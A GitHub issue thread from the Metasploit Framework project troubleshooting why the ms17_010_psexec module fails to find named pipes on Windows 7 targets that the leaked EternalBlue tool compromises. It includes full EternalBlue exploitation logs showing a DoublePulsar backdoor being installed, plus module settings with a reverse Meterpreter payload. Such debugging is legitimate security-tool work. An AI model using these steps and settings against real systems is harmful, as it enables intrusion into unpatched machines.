rapid7 / metasploit-framework

Metasploit Framework
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ms17_010_psexec is not detecting namedpipes that the eternalblue (TSB) is. #9523

Closed Cr0n1c closed 6 years ago

Cr0n1c commented 6 years ago

Steps to reproduce

How'd you do it?

fb Touch (Namedpipetouch) > execute

[!] Preparing to Execute Namedpipetouch
[*] Redirection OFF

[+] Configure Plugin Local Tunnels
[+] Local Tunnel - local-tunnel-1
[?] Destination IP [] : 
[?] Destination Port [445] : 
[+] (TCP) Local

[+] Configure Plugin Remote Tunnels

Module: Namedpipetouch

Name              Value                                                 
----              -----                                                 
NetworkTimeout    60                                                    
TargetPort        445                                                   
UsingNbt          False                                                 
PipeList          ['\PIPE\browser', '\PIPE\lsarpc', '\PIPE\spoolss',    
                   '\PIPE\360OnAccessGet', '\PIPE\360OnAccessSet', '    
                  \PIPE\aswUpdSv', '\PIPE\afwCallbackPipe2', '\PIPE\    
                  afwCallbackPipe2', '\PIPE\aswUpdSv', '\PIPE\_pspus    
                  eafb262f2a4', '\PIPE\AVG7B14C58C-E30D-11DB-B553-F8    
                  ... (plus 47 more lines)                              
DescList          ['OS Pipe: computer browser', 'OS Pipe: lsass rpc'    
                  , 'OS Pipe: print spooler', '360 Safe', '360 Safe'    
                  , 'alwil Avast professional 4.8 Avast Internet Sec    
                  urity v5.0', 'Avast Internet Security 5.0', 'Avast    
                   Internet Security 5.0', 'Avast pro 4.8 or Avast I    
                  S v5.0', 'AVG IS 8.5', 'AVG IS 8.5', 'AVG IS 8.5',    
                  ... (plus 35 more lines)                              
Protocol          SMB                                                   

[?] Execute Plugin? [Yes] : 
[*] Executing Plugin
[+] Initializing Connection...
[+] Connection established.
[+] Testing 86 pipes

[+] Testing for OS Pipe: computer browser
    [+] Pipe Found: \PIPE\browser

[+] Testing for OS Pipe: lsass rpc
    [+] Pipe Found: \PIPE\lsarpc

Throwing EternalBlue from here works.


Name                  Value                                                 
----                  -----                                                 
DaveProxyPort         0                                                     
NetworkTimeout        60                                                    
TargetPort            445                                                   
VerifyTarget          True                                                  
VerifyBackdoor        True                                                  
MaxExploitAttempts    3                                                     
GroomAllocations      12                                                    
Target                WIN72K8R2                                             

[?] Execute Plugin? [Yes] : 
[*] Executing Plugin
[*] Connecting to target for exploitation.
    [+] Connection established for exploitation.
[*] Pinging backdoor...
    [+] Backdoor not installed, game on.
[*] Target OS selected valid for OS indicated by SMB reply
[*] CORE raw buffer dump (43 bytes):
0x00000000  57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73  Windows 7 Profes
0x00000010  73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76  sional 7601 Serv
0x00000020  69 63 65 20 50 61 63 6b 20 31 00                 ice Pack 1.
[*] Building exploit buffer
[*] Sending all but last fragment of exploit packet
[*] Sending SMB Echo request
[*] Good reply from SMB Echo request
[*] Starting non-paged pool grooming
    [+] Sending SMBv2 buffers
    [+] Sending large SMBv1 buffer..DONE.
    [+] Sending final SMBv2 buffers......DONE.
    [+] Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] Sending SMB Echo request
[*] Good reply from SMB Echo request
[*] Sending last fragment of exploit packet!
[*] Receiving response from exploit packet
    [+] ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] Sending egg to corrupted connection.
[*] Triggering free of corrupted buffer.
[*] Pinging backdoor...
    [+] Backdoor returned code: 10 - Success!
    [+] Ping returned Target architecture: x86 (32-bit)
    [+] Backdoor installed
[*] CORE sent serialized output blob (2 bytes):
0x00000000  08 00                                            ..
[*] Received output parameters from CORE
[+] CORE terminated with status code 0x00000000
[+] Eternalblue Succeeded

fb Special (Eternalblue) > 

When trying to use the new module, i have encountered 3 instances where Eternalblue worked but this module bail due to not finding a namedpipe.

Module options (exploit/windows/smb/ms17_010_psexec):

   Name                  Current Setting  Required  Description
   ----                  ---------------  --------  -----------
   DBGTRACE              false            yes       Show extra debug trace info
   LEAKATTEMPTS          99               yes       How many times to try to leak transaction
   NAMEDPIPE                              no        A named pipe that can be connected to (leave blank for auto)
   RHOST              yes       The target address
   RPORT                 445              yes       The Target port
   SERVICE_DESCRIPTION                    no        Service description to to be used on target for pretty listing
   SERVICE_DISPLAY_NAME                   no        The service display name
   SERVICE_NAME                           no        The service name
   SHARE                 ADMIN$           yes       The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
   SMBDomain             .                no        The Windows domain to use for authentication
   SMBPass                                no        The password for the specified username
   SMBUser                                no        The username to authenticate as

Payload options (windows/meterpreter/reverse_http):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST       yes       The local listener hostname
   LPORT     8443             yes       The local listener port
   LURI                       no        The HTTP Path

Exploit target:

   Id  Name
   --  ----
   0   Automatic

msf5 exploit(windows/smb/ms17_010_psexec) > exploit

[*] - Target OS: Windows 7 Professional 7601 Service Pack 1
[-] - Unable to find accessible named pipe!

Even when I specify the NAMEDPIPE it still is unable to find it. Looking at wireshark, I can see that it detects and gets an ACCESS DENIED.

If namedpipe is not detected, should it just use eternalblue? I do not see it using namedpipes in the actual exploit.

I installed Metasploit with:


What OS are you running Metasploit on? Kali

Shadowshusky commented 6 years ago

my moule always said “” /usr/share/metasploit-framework/modules/auxiliary/admin/smb/ms17_010_command.rb: NameError uninitialized constant Msf::Exploit::Remote::SMB::Client::Psexec_MS17_010“ I don't konw why,could you help me to handle this issue?

Cr0n1c commented 6 years ago

mine did too, easiest thing to do is checkout the dev branch. It fixed my stuff. I then ran ```cp -R /root/git/metasploit-framework/ /real/path/to/metasploit-framework. That fixed the issues

busterb commented 6 years ago

Hmm, if you are getting access denied, does this mean that authentication via SMBUser/SMBPass is needed on the target? Can you say more about the target @Cr0n1c ?

Shadowshusky commented 6 years ago

emm...i still have some questions. you mean,git this metasploit framework to my kali,then run it? I move ms17_010_psexec.rb to /usr/share/metasploit-framework/mouldes/exploit/windows/smb,which is same path in this git.But it dosen't work,.....

bcoles commented 6 years ago

@Shadowshusky your issues aren't related detecting name pipes. See issue #9499

Shadowshusky commented 6 years ago

@bcoles thanks,i will try it.

dark8960 commented 6 years ago

me too

Cr0n1c commented 6 years ago

In logical order:

    -> fuzzbunch-2018-02- : Contains the order I ran the scripts.
    -> smbtouch
          -> Smbtouch-1.1.1.exe-2018-02- Text based results of the scan
          -> smbtouch.pcap: Wireshark capture of the scan
    -> namedpipetouch
          -> Namedpipetouch-2.0.0.exe-2018-02- Text based results of the scan
          -> namedpipetouch.pcap: Wireshark capture of the scan
     -> eternalblue
          -> Eternalblue-2.2.0.exe-2018-02- Text based results of exploit (it was already implanted, so it bailed)
          -> Eternalblue-2.2.0.exe-2018-02- Text based results of exploit
          -> eternalblue_fuzzbunch.pcap: Wireshark capture of the successful exploit (not the already sploited on)
      -> doublepulsar
           -> Doublepulsar-1.3.1.exe-2018-02- Text based results [proof of successful sploit]

     msf5 > use auxiliary/scanner/smb/smb_version 
     msf5 auxiliary(scanner/smb/smb_version) > set RHOSTS
     RHOSTS =>
     msf5 auxiliary(scanner/smb/smb_version) > run

     [+]        - Host is running Windows 7 Professional SP1 (build:7601) (name:GAMMA) (workgroup:WORKGROUP )
     [*] Scanned 1 of 1 hosts (100% complete)
     [*] Auxiliary module execution completed
     msf5 auxiliary(scanner/smb/smb_version) > use auxiliary/scanner/smb/pipe_auditor 
     msf5 auxiliary(scanner/smb/pipe_auditor) > show options

     Module options (auxiliary/scanner/smb/pipe_auditor):

        Name       Current Setting  Required  Description
        ----       ---------------  --------  -----------
        RHOSTS                      yes       The target address range or CIDR identifier
        SMBDomain  .                no        The Windows domain to use for authentication
        SMBPass                     no        The password for the specified username
        SMBUser                     no        The username to authenticate as
        THREADS    1                yes       The number of concurrent threads

     msf5 auxiliary(scanner/smb/pipe_auditor) > set RHOSTS
     RHOSTS =>
     msf5 auxiliary(scanner/smb/pipe_auditor) > run

     [*] Scanned 1 of 1 hosts (100% complete)
     [*] Auxiliary module execution completed
     msf5 auxiliary(scanner/smb/pipe_auditor) > use exploit/windows/smb/ms17_010_psexec 
     msf5 exploit(windows/smb/ms17_010_psexec) > set RHOST
     RHOST =>
     msf5 exploit(windows/smb/ms17_010_psexec) > show options

     Module options (exploit/windows/smb/ms17_010_psexec):

        Name                  Current Setting  Required  Description
        ----                  ---------------  --------  -----------
        DBGTRACE              false            yes       Show extra debug trace info
        LEAKATTEMPTS          99               yes       How many times to try to leak transaction
        NAMEDPIPE                              no        A named pipe that can be connected to (leave blank for auto)
        RHOST              yes       The target address
        RPORT                 445              yes       The Target port
        SERVICE_DESCRIPTION                    no        Service description to to be used on target for pretty listing
        SERVICE_DISPLAY_NAME                   no        The service display name
        SERVICE_NAME                           no        The service name
        SHARE                 ADMIN$           yes       The share to connect to, can be an admin share      (ADMIN$,C$,...) or a normal read/write folder share
        SMBDomain             .                no        The Windows domain to use for authentication
        SMBPass                                no        The password for the specified username
        SMBUser                                no        The username to authenticate as

     Exploit target:

        Id  Name
        --  ----
        0   Automatic

     msf5 exploit(windows/smb/ms17_010_psexec) > exploit

     [*] Started reverse TCP handler on 
     [*] - Target OS: Windows 7 Professional 7601 Service Pack 1
     [-] - Unable to find accessible named pipe!
     [*] Exploit completed, but no session was created.
     -> msf_smb_version_and_pipe_auditor.pcap: Wireshark capture of the scan.
     -> msf_ms17_010_psexec.pcap: Wireshark capture of the failed exploit attempt.

     -> ran systeminfo and dir on c:\  Target is a x86 Windows 7 Doublepulsar-1.3.1.exe-2018-02- Doublepulsar-1.3.1.exe-2018-02- Doublepulsar-1.3.1.exe-2018-02- Eternalblue-2.2.0.exe-2018-02- Eternalblue-2.2.0.exe-2018-02- fuzzbunch-2018-02- fuzzbunch-2018-02- Namedpipetouch-2.0.0.exe-2018-02- Smbtouch-1.1.1.exe-2018-02- Smbtouch-1.1.1.exe-2018-02-

Cr0n1c commented 6 years ago

Based on what I am seeing... the eternalblue exploit does not rely on needing a namedpipe. It looks like the other eternals need an authenticated pipe to work.

tkqasn commented 6 years ago

me too,i'm the same target

th1sm0r1 commented 6 years ago

Have you solved the problem?@Cr0n1c

gearcapitan commented 6 years ago

namepipe on widnows 10 ??? kaligearcapitan-2018-03-02-14-20-58

Shadowshusky commented 6 years ago

To be able to use auxiliary/admin/smb/ms17_010_command: + +1. You can OPTIONALLY use a valid username/password to bypass most of these requirements. +2. The firewall must allow SMB traffic. +3. The target must use SMBv1. +4. The target must be missing the MS17-010 patch. +5. The target must allow anonymous IPC$ and a Named Pipe. + +You can check all of these with the SMB MS17-010 and Pipe Auditor auxiliary scanner modules.

I guess the problem may happen in namedpipe.maybe the target changed some options(such as some security standard,so we can't read the namedpipe.I guess if we have the password to login smb,maybe can success.

gearcapitan commented 6 years ago

@Shadowshusky Yes, but if I already have the password for what the fuck I want the exploit ms17 for that there is the exploit only psexec, because what you mention then makes this "exploit" useless because eternal blue if it works but eternal synergy with champions is very conflammatory, obio if or if the so is vulnerable when I do the virtual lab I make sure it is fulnerable and the exploit eternal blue works perfect but this noo osea wft? What's going on?

th1sm0r1 commented 6 years ago

My side is all windows10 14393 There is no success.

kawaxi commented 6 years ago

on the same boat here.... works flawlessly on win 7 ultimate but wont in win 7 pro

xiaoxiaoleo commented 6 years ago

On the same boat too

busterb commented 6 years ago

You just need access to the IPC$ share, not a named pipe.

imanihb2007 commented 5 years ago

Based on what I am seeing... the eternalblue exploit does not rely on needing a namedpipe. It looks like the other eternals need an authenticated pipe to work.

Are you solved your problem?